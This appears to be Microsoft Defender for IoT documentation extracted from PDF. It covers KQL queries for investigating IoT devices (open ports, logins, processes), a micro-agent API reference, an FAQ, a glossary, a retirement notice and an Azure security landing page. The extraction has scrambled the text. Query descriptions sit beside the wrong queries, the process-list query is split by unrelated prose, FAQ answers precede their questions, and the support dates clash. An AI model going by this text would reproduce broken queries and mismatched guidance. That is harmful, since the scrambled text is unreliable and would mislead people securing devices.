Use this data to discover: Which users have access to the device? Do the users with access have the expected permission levels? To find out which ports in the device are currently in use or were used, use the following KQL query: Use this data to discover: Which listening sockets are currently active on the device? Should the listening sockets that are currently active be allowed? Are there any suspicious remote addresses connected to the device? To find users that logged into the device use the following KQL query: Open ports let device = "YOUR_DEVICE_ID"; let hub = "YOUR_HUB_NAME"; SecurityIoTRawEvent | where DeviceId == device and AssociatedResourceId contains tolower(hub) and RawEventName == "ListeningPorts" and extractjson("$.LocalPort", EventDetails, typeof(int)) <= 1024 // avoid short-lived TCP ports (Ephemeral) | project TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)), Protocol=extractjson("$.Protocol", EventDetails, typeof(string)), LocalAddress=extractjson("$.LocalAddress", EventDetails, typeof(string)), LocalPort=extractjson("$.LocalPort", EventDetails, typeof(int)), RemoteAddress=extractjson("$.RemoteAddress", EventDetails, typeof(string)), RemotePort=extractjson("$.RemotePort", EventDetails, typeof(string)) | summarize MinObservedTime=min(TimestampLocal), MaxObservedTime=max(TimestampLocal), AllowedRemoteIPAddress=makeset(RemoteAddress), AllowedRemotePort=makeset(RemotePort) by Protocol, LocalPort User logins
Use the query results to discover: Which users signed in to the device? Are the users that signed in, supposed to sign in? Did the users that signed in connect from expected or unexpected IP addresses? To find out if the process list is as expected, use the following KQL query: let device = "YOUR_DEVICE_ID"; let hub = "YOUR_HUB_NAME"; SecurityIoTRawEvent | where DeviceId == device and AssociatedResourceId contains tolower(hub) and RawEventName == "Login" // filter out local, invalid and failed logins and EventDetails contains "RemoteAddress" and EventDetails !contains '"RemoteAddress":"127.0.0.1"' and EventDetails !contains '"UserName":"(invalid user)"' and EventDetails !contains '"UserName":"(unknown user)"' //and EventDetails !contains '"Result":"Fail"' | project TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)), UserName=extractjson("$.UserName", EventDetails, typeof(string)), LoginHandler=extractjson("$.Executable", EventDetails, typeof(string)), RemoteAddress=extractjson("$.RemoteAddress", EventDetails, typeof(string)), Result=extractjson("$.Result", EventDetails, typeof(string)) | summarize CntLoginAttempts=count(), MinObservedTime=min(TimestampLocal), MaxObservedTime=max(TimestampLocal), CntIPAddress=dcount(RemoteAddress), IPAddress=makeset(RemoteAddress) by UserName, Result, LoginHandler Process list let device = "YOUR_DEVICE_ID"; let hub = "YOUR_HUB_NAME"; SecurityIoTRawEvent | where DeviceId == device and AssociatedResourceId contains tolower(hub) and RawEventName == "ProcessCreate" | project TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)), Executable=extractjson("$.Executable", EventDetails, typeof(string)), UserId=extractjson("$.UserId", EventDetails, typeof(string)), CommandLine=extractjson("$.CommandLine", EventDetails, typeof(string)) | join kind=leftouter ( // user UserId details
Use the query results to discover: Were there any suspicious processes running on the device? Were processes executed by appropriate users? Did any command-line executions contain the correct and expected arguments? After investigating a device, and gaining a better understanding of your risks, you may want to consider Configuring custom alerts to improve your IoT solution security posture. If you don't already have a device agent, consider Deploying a security agent or changing the configuration of an existing device agent to improve your results. SecurityIoTRawEvent | where DeviceId == device and AssociatedResourceId contains tolower(hub) and RawEventName == "LocalUsers" | project UserId=extractjson("$.UserId", EventDetails, typeof(string)), UserName=extractjson("$.UserName", EventDetails, typeof(string)) | distinct UserId, UserName ) on UserId | extend UserIdName = strcat("Id:", UserId, ", Name:", UserName) | summarize CntExecutions=count(), MinObservedTime=min(TimestampLocal), MaxObservedTime=max(TimestampLocal), ExecutingUsers=makeset(UserIdName), ExecutionCommandLines=makeset(CommandLine) by Executable Next steps
Defender-IoT-micro-agent for Azure RTOS API (preview) Article • 03/28/2022 Defender for IoT APIs are governed by Microsoft API License and Terms of use. This API is intended for use with the Defender-IoT-micro-agent for Azure RTOS only. For additional resources, see the Defender-IoT-micro-agent for Azure RTOS GitHub resource . nx_azure_iot_security_module_enable C This routine enables the Azure IoT Defender-IoT-micro-agent subsystem. An internal state machine manages collection of security events and sends them to Azure IoT Hub. Only one NX_AZURE_IOT_SECURITY_MODULE instance is required and needed to manage data collection. Name Description nx_azure_iot_ptr [in] A pointer to a NX_AZURE_IOT . Return values Description Enable Defender-IoT-micro-agent for Azure RTOS Prototype UINT nx_azure_iot_security_module_enable(NX_AZURE_IOT *nx_azure_iot_ptr); Description Parameters Return values
Return values Description NX_AZURE_IOT_SUCCESS Successfully enabled Azure IoT Security Module. NX_AZURE_IOT_FAILURE Failed to enable the Azure IoT Security Module due to an internal error. NX_AZURE_IOT_INVALID_PARAMETER Security module requires a valid #NX_AZURE_IOT instance. Threads nx_azure_iot_security_module_disable C This routine disables the Azure IoT Defender-IoT-micro-agent subsystem. Name Description nx_azure_iot_ptr [in] A pointer to NX_AZURE_IOT . If NULL the singleton instance is disabled. Return values Description NX_AZURE_IOT_SUCCESS Successful when the Azure IoT Security Module is successfully disabled. Allowed from Disable Azure IoT Defender-IoT-micro-agent Prototype UINT nx_azure_iot_security_module_disable(NX_AZURE_IOT *nx_azure_iot_ptr); Description Parameters Return values
Return values Description NX_AZURE_IOT_INVALID_PARAMETER Azure IoT Hub instance is different than the singleton composite instance. NX_AZURE_IOT_FAILURE Failed to disable the Azure IoT Security Module due to an internal error. Threads To learn more about how to get started with Azure RTOS Defender-IoT-micro-agent, see the following articles: Review the Defender for IoT RTOS Defender-IoT-micro-agent overview. Allowed from Next steps
Microsoft Defender for IoT for device builders frequently asked questions Article • 01/10/2023 This article provides a list of frequently asked questions and answers about the Defender for IoT agent. Agent installation on your IoT devices isn't mandatory in order to enable Defender for IoT. You can choose between the following two options There are four different levels of security monitoring, and management capabilities, which will provide different levels of protection: Install the Defender for IoT embedded security agent with or without modifications. This option provides the highest level of enhanced security insights into device behavior and access. No security agent installation on your IoT devices. This option enables IoT Hub communication monitoring, with reduced security monitoring, and management capabilities. Defender for IoT agent provides device level threat coverage for device configuration, behavior, and access (by scanning the configuration), process & connectivity. The Defender for IoT security agent does not scan business-related data or activity. The Defender for IoT security agent is open source and available on GitHub in 32 bit and 64-bit Windows and Linux versions: https://github.com/Azure/Azure-IoT-Security . Defender for IoT supports a wide variety of platforms. See Supported Device platforms to verify support for your specific devices. Do I have to install an embedded security agent? What does the Defender for IoT agent do? What are the dependencies and prerequisites of the agent?
Connectivity, access, firewall configuration, process list & OS baseline are collected by the agent. Agent data generation is driven by device, application, connectivity type, and customer agent configuration. Due to the high variability between devices and IoT solutions, we recommend first deploying the agent in a lab or test setting to observe, learn, and set the specific configuration that fits your needs, while measuring the amount of generated data. After starting the service, the Defender for IoT agent provides operational recommendations for optimizing agent throughput to help you with the configuration and customization process. Yes. Agent transmitted data is counted in your IoT Hub quota. 1. Check the agent type fits the designated OS platform of your device 2. Confirm the agent is running on the device. 3. Check the service was enabled successfully to Security in your IoT Hub. 4. Check that the device is configured in IoT Hub with the Defender for IoT module. If the activities or logs are still unavailable, contact your Defender for IoT partner for additional help. The sensors and agents continue to run and store data as long as the device is running. Data is stored in the security message cache according to size configuration. When the Which data is collected by the agent? How much data will the agent generate? Do agent messages use up quota from IoT Hub? What next? I've installed an agent and don't see any activities or logs... What happens when the internet connection stops working?
device regains connectivity, security messages resume sending. The agent consumes machine resources as any other application/process and should not disrupt normal device activity. Resource consumption on the device the agent runs on is coupled with its setup and configuration. We recommend testing your agent configuration in a contained environment, along with interoperability with your other IoT applications and functionality, before attempting to deploy in a production environment. The agent cannot be turned off. If the agent stops communicating or fails to send security messages, a Device is silent alert is generated. Yes, you can create custom alerts based on multiple parameters including IP/MAC address, protocol type, class, service, function, command, and so on, as well as values of custom tags contained in the payloads. See Create custom alerts to learn more about custom alerts and how to create them. To learn more about how to get started with Defender for IoT, see the following articles: Read the Defender for IoT overview Understand Defender for IoT security alerts Can the agent affect the performance of the device or other installed software? I'm making some maintenance on the device. Can I turn off the agent? Is there a way to test if the agent is working correctly? Can I create my own alerts? Next steps
Defender for IoT glossary for device builder Article • 01/10/2023 This glossary provides a brief description of important terms and concepts for the Microsoft Defender for IoT platform. Select the Learn more links to go to related terms in the glossary. This will help you to learn and use the product tools quickly and effectively. Term Description Learn more Device twins Device twins are JSON documents that store device state information including metadata, configurations, and conditions. Module Twin Defender-IoTmicro-agent twin (DB) The Defender-IoT-micro-agent twin holds all of the information that is relevant to device security, for each specific device in your solution. Device twin Module Twin Device inventory Defender for IoT identifies, and classifies devices as a single unique network device in the inventory for: - Standalone IT, OT, and IoT devices with 1 or multiple NICs. - Devices composed of multiple backplane components. This includes all racks, slots, and modules. - Devices that act as network infrastructure. For example, switches, and routers with multiple NICs. - Public internet IP addresses, multicast groups, and broadcast groups aren't considered inventory devices. Devices that have been inactive for more than 60 days are classified as inactive Inventory devices. D I
Term Description Learn more Term Description Learn more IoT Hub Managed service, hosted in the cloud, that acts as a central message hub for bidirectional communication between your IoT application and the devices it manages. Term Description Learn more Micro Agent Provides depth security capabilities for IoT devices including security posture and threat detection. Module twin Module twins are JSON documents that store module state information including metadata, configurations, and conditions. Device twins Defender-IoTmicro-agent twin M
Feature support and retirement Article • 01/10/2023 This article describes Microsoft Defender for IoT features and support for different capabilities within Defender for IoT. The Defender-IoT-micro-agent has been replaced by our newer micro-agent experience. For more information, see Tutorial: Create a DefenderIotMicroAgent module twin (Preview) and Tutorial: Install the Defender for IoT micro agent (Preview). Microsoft Defender for IoT will continue to support the legacy Microsoft Defender for IoT experience under IoT hub until March 31, 2023. The new micro agent will replace the current C, C#, and Edge Defender-IoT-microagent. The new micro agent development is based on the knowledge, and experience gathered from the legacy security module development, customers, and feedback from partners with four important improvements: Depth security value: The new agent will run on the host level, which will provide more visibility to the underlying operations of the device, and to allow for better security coverage. Improved device performance and reduced footprint: Achieved by a small RAM, and ROM memory footprint as well as low CPU consumption. Plug and play: The new micro agent has no kernel level dependencies anymore, and all of its software dependencies are provided as part of its package. The micro agent supports common CPU architecture. Easy to deploy: The micro agent supports different distribution models, through source code, and as a binary package. Legacy Defender for IoT micro-agent Timeline Defender for IoT C, C#, and Edge Defender-IoTmicro-agent deprecation
Defender for IoT will continue to support C, C#, and Edge until March 1, 2022. During the preview the micro agent may experience breaking changes without notice. Check out Microsoft Defender for IoT agent frequently asked questions. Timeline Micro agent preview support Next steps
W H A T ' S N E W Learn about the Microsoft Entra family of multicloud identity and access solutions C O N C E P T Build a Zero Trust Foundation C O N C E P T Back up and restore plan to protect against ransomware C O N C E P T Protect your multicloud environment with unified security management and… H O W - T O G U I D E Understand security coverage by the MITRE ATT&CK framework O V E R V I E W Combine SIEM and XDR to defend against modern attacks W H A T ' S N E W Sunset for SHA-1 Online Certificate Standard Protocol signing C O N C E P T Use watchlists in Microsoft Sentinel Modernize security operations e Introduction to Azure security p Shared responsibilities for cloud computing Data security & governance, risk, and compliance e Introduction to information protection and governance in Microsoft 365 p Azure Policy service Secure identities and access c Securing identity with Zero Trust p Securing privleged access p Building apps with a Zero Trust approach to identity Azure security documentation Azure offers security advantages that support your compliance efforts, provide cost-effective security for your organization, and help protect your hybrid and multicloud platforms, applications, and data.
p Protect against ransomware p Deploy an information protection solution with Microsoft Purview Security guidance for each phase of your cloud migration journey Strategy and planning Define business justification and expected outcomes of adoption Define a security strategy Envision a security end state Develop a cloud adoption plan Implementation and operation Migrate and modernize security operations management Application migration, modernization, and innovation Cloud management for operations team and architects Unlock new technical skills and expand capabilities Cloud architecture Design, build, and continuously improve your cloud architecture Security architecture design Security pillar of your architecture Microsoft Cybersecurity Reference Architectures Continued learning Discover learning paths that help you improve your security in the cloud Information protection and governance in Microsoft 365 Secure your cloud applications in Azure Implement perimeter security Additional security guidance Microsoft Learn training Microsoft Cloud Adoption Framework for Azure Azure security fundamentals
If you're new to security, build your skills with Microsoft Learn training Secure methodology designed to help cloud architects and business decision makers create and implement securit… For every phase of your cloud journey, learn how to secure your cloud solutions on Azure Azure Security Benchmark Best practices and recommendations to secure your cloud deployments Azure Well-Architected Framework Design principles for a securely architected system hosted on cloud or on-premises datacenters Azure Architecture Center A set of guiding tenets that can be used to protect your applications and data from threats Microsoft Security Best Practices Collection of best practices that provide clear actionable guidance for security related decisions, includes Azure and… Secure development Learn how to develop and deploy secure applications on Azure with our sample apps, best practices, and guidance Security services and capabilities Microsoft Sentinel See and stop threats before they cause harm Overview Onboard Microsoft Sentinel Learn: Cloud-native security operations with Microsoft Sentinel Microsoft Defender for Cloud Unify security management and advanced threat protection across hybrid cloud workloads Overview Protect your resources Learn: Secure your cloud apps and services Microsoft Defender for Identity Improve security of hybrid environments from cyber attacks and insider threats Overview Deploy Microsoft Defender for Identity with Microsoft 365 Defender Learn: Defend against attacks Azure key management Key management solutions in Azure Key management in Azure Choosing a key management solution Azure Key Vault Azure Managed HSM Azure Dedicated HSM Azure Payment-HSM Microsoft Defender for Cloud Apps Cloud Access Security Broker (CASB) that operates on multiple clouds Overview Get started Detect and manage suspicious activity Microsoft Defender for IoT Threat detection for IoT/OT environments Overview Get started with Defender for IoT Learn: Enhance IoT solution security
Azure Information Protection Control and secure emails, documents, and sensitive data Overview Deploying the client Discovering your sensitive content Azure Active Directory Multi-tenant, cloud-based identity and access management service Overview Security operations guide Learn: Secure Azure Active Directory users with MultiFactor Authentication Microsoft 365 Defender Security solutions that protect your enterprise across attack surfaces Overview Get started Security operations guide